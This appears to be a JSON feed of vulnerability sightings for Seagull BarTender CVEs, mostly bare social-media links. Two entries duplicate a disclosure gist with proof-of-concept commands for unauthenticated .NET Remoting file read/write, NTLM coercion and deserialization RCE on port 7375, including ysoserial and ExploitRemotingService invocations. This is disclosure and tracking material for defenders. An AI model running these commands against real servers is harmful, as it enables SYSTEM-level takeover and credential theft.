{"vulnerability": "cve-2026-2555", "sightings": [{"uuid": "cd8e7be0-1999-4ef9-b111-4a091e29642a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfjmyveiys2b", "content": "", "creation_timestamp": "2026-02-23T12:16:34.060688Z"}, {"uuid": "acaffcaa-7d2f-4f86-b32f-588d01e49294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfjoqaj3fc2b", "content": "", "creation_timestamp": "2026-02-23T12:47:31.334668Z"}, {"uuid": "87288aea-fa86-4176-8e77-b6b8935794dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfjqjzcgi22b", "content": "", "creation_timestamp": "2026-02-23T13:19:49.502266Z"}, {"uuid": "6e58ac38-5521-44c5-93ae-e360aa12e594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfh6qh6qa22o", "content": "", "creation_timestamp": "2026-02-22T12:55:58.325733Z"}, {"uuid": "cc4d92d4-34bf-4b60-b90a-f352ba5e3282", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25554", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3mhgtc4xz232q", "content": "", "creation_timestamp": "2026-03-19T20:21:28.437363Z"}, {"uuid": "a71b2352-e5d0-4de3-9250-385ae2ddf5d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25554", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3mhg5uqiygc2q", "content": "", "creation_timestamp": "2026-03-19T13:58:10.841990Z"}, {"uuid": "7bdb1798-0b47-43bd-bacc-982e806eb1c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25554", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3mhgzdfpkbi2c", "content": "", "creation_timestamp": "2026-03-19T22:09:33.675478Z"}, {"uuid": "d80f3f73-d570-4ec6-a219-4ecd5d2f3b92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-25554", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3mhkzdcc3tm2i", "content": "", "creation_timestamp": "2026-03-21T12:20:08.809317Z"}, {"uuid": "e8699c57-1d83-45b9-a6ea-6fa46a48037b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25550", "type": "seen", "source": "https://gist.github.com/VAMorales/dde5b1c0415a8505ccd6fafdb095a618", "content": "# 1. Exploit Title: Seagull Scientific BarTender - Unauthenticated Arbitrary File Read/Write + RCE & SMB coercion via .NET Remoting\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25550](https://www.cve.org/cverecord?id=CVE-2026-25550)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10\n\n### Description\nBarTender exposes a deprecated .NET Remoting TCP channel running in secure mode on port 7375 to all interfaces via the BtSystem.Service.exe Service executable. This can be exploited using anonymous authentication on the .NET TCP remoting endpoint that varies by version to coerce the target to an attacker-specified SMB share or to arbitrarily read/write files to the server in the context of NT AUTHORITY\\SYSTEM. By modifying the PoC of Code-White's RemotingClient_MBRO.exe program to implement a custom channel sink to redirect .NET Remoting traffic to the correct host and run in secure mode, an unauthenticated remote attacker can exploit .NET Remoting object unmarshalling techniques to read arbitrary files from the server filesystem, write attacker-controlled files to the server, or coerce NTLMv2 authentication to an attacker-controlled host, enabling sensitive credential disclosure, denial of service, remote code execution, or lateral movement depending on service account privileges and network environment.\n\n### PoC\nBarTender 2019 <= R10\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton \\\\\\file`\n\nBarTender 2016 <= R9\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem \\\\\\file`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n```\n\n# 2. Exploit Title: Seagull Scientific BarTender - Unauthenticated .NET Remoting Deserialization + RCE\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25551](https://www.cve.org/cverecord?id=CVE-2026-25551)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10, 2021 R1 through 12.0.1\n\n### Description\nBarTender registers a .NET remoting TCP channel on port 7375 running in secure mode exposed to all interfaces with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full. An unauthenticated attacker can generate a malicious serialized payload and send it to the .NET remoting endpoint using anonymous authentication to obtain Remote Code Execution on the server in the context of NT AUTHORITY\\SYSTEM.\n\nBarTender versions from 2021 R1 onwards restricted the .NET remoting TCP channel to bind to localhost only. Despite this change, the service is still registered with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full, which can still be leveraged to perform local privilege escalation to elevate a low-privileged user to NT AUTHORITY\\SYSTEM.\n\n### PoC\n`.\\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c \"\" -o base64`\n\nBarTender 2019 <= R10\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/DataServiceSingleton raw `\n\nBarTender 2016 <= R9\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/BarTenderSystem raw `\n\nBarTender 2021 R1 through 12.0.1\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://localhost:7375/DataServiceSingleton raw `", "creation_timestamp": "2026-06-03T11:43:22.000000Z"}, {"uuid": "9ba4ca2a-991c-44ab-8970-95247578014a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25551", "type": "seen", "source": "https://gist.github.com/VAMorales/dde5b1c0415a8505ccd6fafdb095a618", "content": "# 1. Exploit Title: Seagull Scientific BarTender - Unauthenticated Arbitrary File Read/Write + RCE & SMB coercion via .NET Remoting\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25550](https://www.cve.org/cverecord?id=CVE-2026-25550)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10\n\n### Description\nBarTender exposes a deprecated .NET Remoting TCP channel running in secure mode on port 7375 to all interfaces via the BtSystem.Service.exe Service executable. This can be exploited using anonymous authentication on the .NET TCP remoting endpoint that varies by version to coerce the target to an attacker-specified SMB share or to arbitrarily read/write files to the server in the context of NT AUTHORITY\\SYSTEM. By modifying the PoC of Code-White's RemotingClient_MBRO.exe program to implement a custom channel sink to redirect .NET Remoting traffic to the correct host and run in secure mode, an unauthenticated remote attacker can exploit .NET Remoting object unmarshalling techniques to read arbitrary files from the server filesystem, write attacker-controlled files to the server, or coerce NTLMv2 authentication to an attacker-controlled host, enabling sensitive credential disclosure, denial of service, remote code execution, or lateral movement depending on service account privileges and network environment.\n\n### PoC\nBarTender 2019 <= R10\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton \\\\\\file`\n\nBarTender 2016 <= R9\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem \\\\\\file`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n```\n\n# 2. Exploit Title: Seagull Scientific BarTender - Unauthenticated .NET Remoting Deserialization + RCE\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25551](https://www.cve.org/cverecord?id=CVE-2026-25551)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10, 2021 R1 through 12.0.1\n\n### Description\nBarTender registers a .NET remoting TCP channel on port 7375 running in secure mode exposed to all interfaces with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full. An unauthenticated attacker can generate a malicious serialized payload and send it to the .NET remoting endpoint using anonymous authentication to obtain Remote Code Execution on the server in the context of NT AUTHORITY\\SYSTEM.\n\nBarTender versions from 2021 R1 onwards restricted the .NET remoting TCP channel to bind to localhost only. Despite this change, the service is still registered with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full, which can still be leveraged to perform local privilege escalation to elevate a low-privileged user to NT AUTHORITY\\SYSTEM.\n\n### PoC\n`.\\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c \"\" -o base64`\n\nBarTender 2019 <= R10\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/DataServiceSingleton raw `\n\nBarTender 2016 <= R9\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/BarTenderSystem raw `\n\nBarTender 2021 R1 through 12.0.1\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://localhost:7375/DataServiceSingleton raw `", "creation_timestamp": "2026-06-03T11:43:22.000000Z"}, {"uuid": "252a601f-a137-4fb0-920a-6178f9e04f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25550", "type": "seen", "source": "https://bsky.app/profile/hugovalters.bsky.social/post/3mniquk35ws2f", "content": "CVE-2026-25550 - Critical RCE in Seagull BarTender. Unpatched flaw in .NET Remoting service on TCP 7375. CVSS 9.8. No fix available. Disable service or restrict network access immediately. #CVE #seagull #infosec\n\nhttps://www.valtersit.com/cve/CVE-2026-25550/", "creation_timestamp": "2026-06-04T23:14:34.487415Z"}]}